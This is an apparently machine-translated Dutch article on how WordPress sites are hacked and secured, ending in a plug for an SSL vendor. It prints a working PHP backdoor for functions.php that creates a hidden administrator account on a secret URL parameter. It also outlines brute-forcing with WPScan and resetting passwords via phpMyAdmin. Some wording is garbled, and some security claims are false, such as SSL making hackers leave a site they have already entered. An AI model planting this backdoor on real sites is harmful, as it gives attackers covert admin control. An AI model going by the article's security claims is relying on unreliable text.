Hoe WordPress te hacken?

Hoe WordPress te hacken (intro.png)

Intro

Voordat we met dit artikel beginnen, willen we u laten weten dat hacken illegaal is, en dat we geen kwaadwillende activiteiten motiveren of aanmoedigen. Dit artikel is uitsluitend bedoeld om kennis op te doen over hoe scammers te werk gaan en hoe verschillende methoden van sitebeveiliging essentieel zijn om ze op afstand te houden. Laten we het bespreken:

• Hoe hacken scammers WordPress?
• Hoe beveilig je je WP site tegen scammers?

Dus, zonder verder oponthoud, laten we beginnen aan het onderwerp.

Hoe WordPress Website Online Hacken?

Hoe WordPress Website Online Hacken? (hack-into-een-wordpress-website.jpg) (Bron: wpsecurityninja.com)

WPScan gebruiken:

WPScan is een WP-beveiligingsscanner die site-eigenaren helpt om hun WordPress-site te controleren op kwetsbaarheden, maar deze scanner wordt ook gebruikt door hackers om hun motieven te vervullen om websites te hacken.

WPScan staat site-eigenaren en beheerders toe om WP gebruikersaccounts en brute force wachtwoorden te specificeren en zijn de eerste stap in het verkrijgen van ongeautoriseerde toegang tot WP accounts.

Brute kracht gebruikersnaam en wachtwoord met WPScan](image4.png) (Brute force gebruikersnaam en wachtwoord met WPScan. Bron: Medium)

MIM Aanvallen:

Man-in-middle (MIM) aanvallen kunnen gemakkelijk worden uitgevoerd in het geval van gebruikers die vergelijkbare LAN's gebruiken. Niet-gecodeerde gebruikerslogins zijn een makkelijk doelwit omdat alle details zichtbaar zijn in platte tekst.

De software die bij dit soort aanvallen wordt gebruikt, kan gecompromitteerde thema's en plugins opsporen en gebruikers opsommen.

MIM-aanvallen](image3.png) (Bron: Medium)

SQL Injecties:

SQL-injectie-aanvallen worden beschouwd als de meest prominente aanvallen die worden gebruikt voor het binnendringen van websites. Deze aanvallen richten zich op de backend gateways van de website en stellen hackers in staat deze binnen te dringen door gecompromitteerde commando's uit te voeren.

SQL-injecties](image6.jpg) (Bron: secure.wphackedhelp.com)

Deze penetraties stellen hackers ook in staat databases en commando's te wijzigen en site-informatie te verwijderen of te stelen.

Aangezien deze SQL-aanvallen kwetsbare en ongepatchte sites opsporen, maken ze de hacktaak gemakkelijk en succesvol.

My SQL/cPanel gebruiken:

Bij deze methode maken hackers een nepaccount aan of wijzigen ze het wachtwoord van een huidige WP-sitegebruiker. Hackers proberen binnen te dringen via het cPanel door PhpMyAdmin te openen. Ze zijn op zoek naar de tabel die eindigt op _users en vinden de gebruiker die ze willen wijzigen.

Dit zal hen in staat stellen de inloggegevens te wijzigen van de gebruiker die ze willen hacken. Zij traceren de gebruiker en wijzigen het wachtwoord van de gebruiker (van het user_pass veld) door de online MD5 generator te openen, en vervangen dit door het gewenste wachtwoord, en klikken later op #.

Gebruik makend van mijn SQL/cPanel](image5.jpg) (Gebruikersnamen, gehashte wachtwoorden van gebruikers, hun e-mail ID's, enz. zijn allemaal opgeslagen in de wp_users database tabel. Bron: firstsiteguide.com)

Gebruikersnamen, gehashte wachtwoorden van gebruikers, hun e-mail ID's, enz. zijn allemaal opgeslagen in de wp_users database tabel.

Functions.php bewerken:

Hackers krijgen ook toegang tot het cPanel om het Functions.php bestand te wijzigen. Door de bestandsmanager te ontgrendelen, gaan ze op zoek naar de map van het actieve thema. Vanuit de public_html/wp_content/themes map, traceren ze het thema en bewerken de functions.php door hun gecompromitteerde code te plaatsen. Het hacken is al in gang gezet omdat de hackers een nieuw account hebben aangemaakt. Eenmaal gedaan, wissen ze de gecompromitteerde code.

Maak een nieuwe gebruikersaccount aan via FTP:

Over het algemeen helpen FTP-accounts site-eigenaren om een map binnen hun site te genereren die specifieke gebruikers toestaat om hun bestanden te uploaden/downloaden met behulp van hun inloggegevens.

Deze bestanden worden ook bekeken op het internet.

> Stappen om een FTP-account op de site te maken: > > - Voer de gewenste gegevens in > - Voer de gebruikersnaam in van de nieuwe FTP-gebruiker > - Voer het wachtwoord in voor het toewijzen van de account voor toegang via FTP > - Voer de naam van de directory in voor het verlenen van toegang via FTP > - Noteer de gewenste MB ruimte die u wenst toe te kennen aan deze map > - Druk later op de "Create " knop om het nieuwe account aan te maken.

De hieronder vermelde gegevens moeten door de nieuwe gebruiker worden geladen om toegang te krijgen via FTP.

Adres / Hostnaam / Adres: uwdomein.com of ftp.uwdomein.com

Gebruiker / User: [email protected]

Wachtwoord: El wachtwoord toegewezen aan deze FTP-account

Port: 21 Noem de map voor het uploaden/downloaden van bestanden.

De nieuwe gebruiker krijgt lees- en schrijfrechten op zowel de gekozen map als op alle submappen die deze bevat.

Bijvoorbeeld, als u de client-gebruiker en geef hem toegang tot de / home / user / public_html

Penetreren via Backdoor:

Een kwaadaardige manier om de site binnen te dringen is via de backdoor. Of het nu een scammer is die toegang tot uw site wil krijgen, of de slachtoffer gebruiker, die weer toegang tot hun site wil krijgen via een backdoor, ze moeten beiden de onderstaande stappen volgen.

In gevallen, wanneer een nieuwe gebruikersaccount is aangemaakt via FTP of een wachtwoord reset is gedaan, maar het geeft niet de gewenste resultaten, kan de gebruiker hun site willen hacken via backdoor entry en hun admin toegang terug krijgen.

Stappen om een Backdoor te maken:

• Open het functions.php bestand en plak de onderstaande code.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Sla later de veranderingen op.

Crypto Jacking & Cryptocurrency Mining:

De populariteit van cryptocurrencies heeft aanleiding gegeven tot nieuwe cyberbedreigingen zoals crypto-jacking, wat ook wel cryptocurrency mining malware wordt genoemd.

De handeling waarbij een computer in beslag wordt genomen tegen de wil en het bewustzijn van de gebruiker, wordt crypto-jacking genoemd. Bij crypto-jacking malware infecteren de oplichters de computer van de gebruiker met kwaadaardige malware die via software wordt afgeleverd om systemen en netwerken te compromitteren.

Phishing:

Phishing is een methode waarbij fraudeurs gebruikers hun gevoelige informatie ontfutselen (inloggegevens, sociaal rekeningnummer, pincode, creditcardgegevens, enz.) door zich voor te doen als rechtspersonen. Meestal maken ze gebruik van e-mails om hun doel te bereiken.

> Voorbeeld: Een oplichter kan zich voordoen als een betrouwbare bron en persoonlijke gegevens van gebruikers verzamelen om hun wensen te vervullen. > Ze kunnen ook een slechte link in de phishing-e-mail plaatsen en hen naar een frauduleuze site leiden om malware af te leveren.

Malware:

WordPress Security Statistics geven aan dat 4000 WP-websites zijn geïnfecteerd door malware als gevolg van nep SEO-plugins.

Oplichters hebben geen bron nodig om malware af te leveren. SEO plugins, WP thema's, en vele andere factoren aanwezig in de site hebben hackers gemotiveerd om de recente WP-VCD malware te gebruiken.

Zelfs phishing emails zijn toegangspoorten voor het leveren van malware.

Ook hier is het motto van de hackers hetzelfde, namelijk het verkrijgen van gevoelige gegevens van gebruikers door systemen binnen te dringen en informatie te stelen.

WordPress Ransomware:

Bij WP ransomware gebruiken hackers malware om de toegang van gebruikers tot systemen en netwerken te blokkeren. De gebruiker kan de informatie terugkrijgen door losgeld te betalen dat door de hacker wordt geëist. > Voorbeeld: De Petya aanval, waarbij de hacker uw bestanden en gegevens versleutelt en losgeld eist voor de decryptiesleutel.

Cross-Site Scripting (XSS) aanval:

XSS-aanvallen worden door hackers uitgevoerd door kwaadaardige inhoud in de website te injecteren en zo de browser uit te buiten. Met deze aanval kan de hacker gegevens uit cookies stelen, de inhoud van de site wijzigen en de website in beslag nemen om gevoelige gegevens te verkrijgen.

Clickjacking:

Bij clickjacking doet de hacker een kwaadaardige poging om een knop/link te compromitteren en motiveert hij de gebruiker om op het gecompromitteerde object te klikken. Hierdoor kan de hacker kwaadaardige commando's uitvoeren om toegang te krijgen tot gevoelige gegevens van de gebruiker.

Spoofing:

Spoofing is een aanval waarbij de persoon zich vermomt als een betrouwbare identiteit om illegaal voordeel te behalen op de gebruiker en hem te misleiden tot het verstrekken van zijn vertrouwelijke informatie.

Om al deze hacking aanvallen te voorkomen, moeten specifieke veiligheidsmaatregelen worden genomen om uw WP website te beveiligen.

Hoe WordPress Website Beveiligen tegen Hacking?

Hoe WordPress Website Beveiligen Tegen Hacken? (Bron: envisagedigital.co.uk)

Bovenstaande statistieken zijn genoeg om de populariteit van WordPress aan te geven. Het is deze populariteit die dit CMS platform meer gewild maakt bij hackers, die verschillende hacking methodes proberen om toegang te krijgen tot WP websites en hun gegevens.

Daarom is het essentieel om te weten hoe je voorkomt dat hackers toegang krijgen tot je WP site.

Beveilig je WP site met SSL Certificaat:

Wanneer er gegevens op de site worden geladen, is dit altijd in platte tekst die gemakkelijk zichtbaar is voor iedereen, inclusief hackers. Dit kan riskant zijn aangezien hackers misbruik kunnen maken van uw site gegevens.

SSL (Secure Socket Layers) certificaten zijn die digitale certificaten die helpen bij het beveiligen van uw WP site met 256-bit encryptie veiligheid, waardoor uw site gegevens worden omgezet in een gecodeerd formaat.

Hackers kunnen geen codes lezen hoewel ze toegang hebben gekregen tot uw site en daarom worden ze gedwongen dergelijke sites te verlaten.

Beveilig uw WP site met SSL Certificaat](ssl.jpg) (Bron: clickssl.net)

Selecteer het gewenste merk SSL-certificaat (Comodo, Thawte, RapidSSL, enz.) en installeer het op uw WP-site. In het geval van het type SSL-certificaat, moet u domeinen en subdomeinen begrijpen. Bijvoorbeeld, als uw WP site subdomeinen heeft dan, kan een enkel goedkoop Wildcard Certificaat dat slechts $45/jaar kost ongeveer uw hele digitale bedrijf beveiligen.

Snelle uitgifte, 2048-bit sleutel encryptie, een boost in SEO, site trust seal, 99% browser/mobiele compatibiliteit, terugbetalingsbeleid, en garantie zijn een paar van de kenmerken en voordelen van het installeren van Wildcard SSL-certificaten.

Gevarieerde merken en opties van SSL-producten, budgetvriendelijke tarieven, en een uitstekende klantenservice zijn enkele van de voordelen van het benaderen van ClickSSL shop voor het beveiligen van uw WP-site.

Update uw Medewerkers:

Menselijke fouten kunnen desastreus zijn, dus zorg er altijd voor dat u uw medewerkers op de hoogte houdt van de nieuwste cyberbedreigingen om te voorkomen dat ze kwetsbaar zijn.

Als uw medewerkers de verdachte signalen van een gehackte website in het beginstadium kunnen traceren, kunnen zij de betrokkenen informeren en voorkomen dat uw site en bedrijf verdere schade oplopen.

Gebruik Two-Factor Authentication (2FA):

Het implementeren van 2FA tijdens het inloggen op de site is de meest centrale manier om brute force-aanvallen af te weren. Ze voegen niet alleen een extra beveiligingslaag toe, maar voorkomen ook dat site- en gebruikersgegevens worden onderschept.

Dit komt omdat als één beveiligingslaag gecompromitteerd is, de oplichter de tweede laag moet binnendringen om toegang tot de website te krijgen.

Dit is een moeilijke opgave en daarom verhuizen oplichters in de meeste gevallen uiteindelijk naar andere slecht beveiligde sites.

> Tip: WP 2FA is een gratis WP plugin die een extra beveiligingslaag geeft aan uw WP site.

Controleer Admin Gebruikers regelmatig:

Dit is belangrijk voor de beveiliging van je WP site. Zorg ervoor dat u uw admin gebruikers regelmatig controleert en hun toegangen kruiselings controleert.

Zorg er ook voor dat uw gebruikers, evenals medewerkers, beperkte toegang hebben volgens hun taken, om veiligheidslekken te voorkomen.

Update WordPress Core regelmatig:

Niet op de hoogte van WP Core?

Laat me u inlichten dat WP Core alle basis bestanden bevat die nodig zijn om WP te laten werken.

De lijst met bestanden in de WP zip file gedownload van WordPress.org

Update WordPress Core regelmatig](image10.png) (Bron: ithemes.com)

Deze core bestanden moeten regelmatig worden bijgewerkt na het uitbrengen van beveiligingsupdates, om alle beveiligingslekken te patchen.

Download WP Thema's & Plugins van betrouwbare bronnen:

Dit is cruciaal omdat plugins bedreigend kunnen zijn wanneer ze niet worden bijgewerkt of worden geïnstalleerd van niet-betrouwbare bronnen. In het geval van het gebruik van gratis / betaalde plugins, controleer altijd de hieronder genoemde factoren zoals:

• Gebruikerswaarderingen & reviews
• Gebruiksvriendelijkheid
• compatibiliteit
• Veiligheid
• Betrouwbaarheid

Download WP Thema's & Plugins van Betrouwbare Bronnen](image11.png) (Bron: torquemag.io)

Dezelfde regel geldt ook voor het installeren van WP-thema's.

Update WP Thema's & Plugins regelmatig:

Verouderde of verlopen WP thema's en plugins vormen altijd een bedreiging voor je WP site omdat ze inboeten aan veiligheidsstandaarden. Om te voorkomen dat hackers dergelijke poorten gebruiken voor het verspreiden van malware om toegang tot de site te krijgen, moet u ervoor zorgen dat u de thema's en plugins die worden gebruikt in uw WP site regelmatig bijwerkt.

Dit zal helpen de plugin goed te laten functioneren en in sync te blijven met de nieuwste versies van WP.

> Tip: Op de pagina plugins, kunt u alle geïnstalleerde plugins en een link waarin staat "Enable auto-updates" naast elke plugin. Zet het aan voor automatische updates.

Wijzig de standaard Admin Naam:

Hackers zijn te slim, en ze kunnen gemakkelijk uw WP site binnendringen door de standaard admin naam te gebruiken. Het is altijd beter om de standaard admin gebruikersnaam te wijzigen om hackers te verhinderen brute-force aanvallen uit te voeren om ongeoorloofde toegang tot uw website te verkrijgen.

Beperkte toegang verlenen:

Geef nooit meer dan nodig en dezelfde regel geldt voor het verlenen van sitetoegang aan zowel gebruikers als medewerkers.

Toegangscontrole is de belangrijkste regel van de site en data veiligheid omdat het bepaalt wie wel of geen toegang heeft tot de website. Blokkeer alle toegangen tot WP admin en andere kritieke codes en data voor site beveiliging.

Niet alleen verbetert beperkte toegang de productiviteit, maar het beveiligt uw site ook tegen kwaadwillige ingangen.

Update WordPress:

Wanneer uw WordPress niet is bijgewerkt, loopt uw site het risico te worden binnengedrongen door hackers.

WordPress heeft 37% van het marktaandeel, en het blijft regelmatig updates uitbrengen om veiligheidslekken en bugs te repareren. Deze updates bevatten ook nieuwe functies en verbeteringen van de bestaande die nuttig zijn voor het verbeteren van de prestaties van uw site.

Waarom je wordpress altijd moet updaten](update-wordpress.png) (Bron: wpbeginner.com)

Houd je WP site bijgewerkt voor een robuuste beveiliging.

Wrapping Up:

Gebruik sterke en complexe wachtwoorden en houd uw WP site evenals plugins en thema's bijgewerkt om alle beveiligingslekken te verhelpen. Neem de tijd om uw medewerkers op te leiden, want dat helpt altijd bij het voorkomen van rampen.

Ga nooit voorbij aan beveiliging en zorg er altijd voor dat je de beste en vertrouwde beveiligingsplugins gebruikt om je WP site veilig te houden voor nieuwsgierige ogen. Beveilig uw site bovendien met SSL om het vertrouwen van de klant, het bedrijf en SEO te verbeteren.

Nu je je bewust bent van hoe hackers te werk gaan, hopen we dat dit artikel je helpt bij het voorkomen dat hackers je site binnendringen en bij het op een veilige manier beheren van je WP site.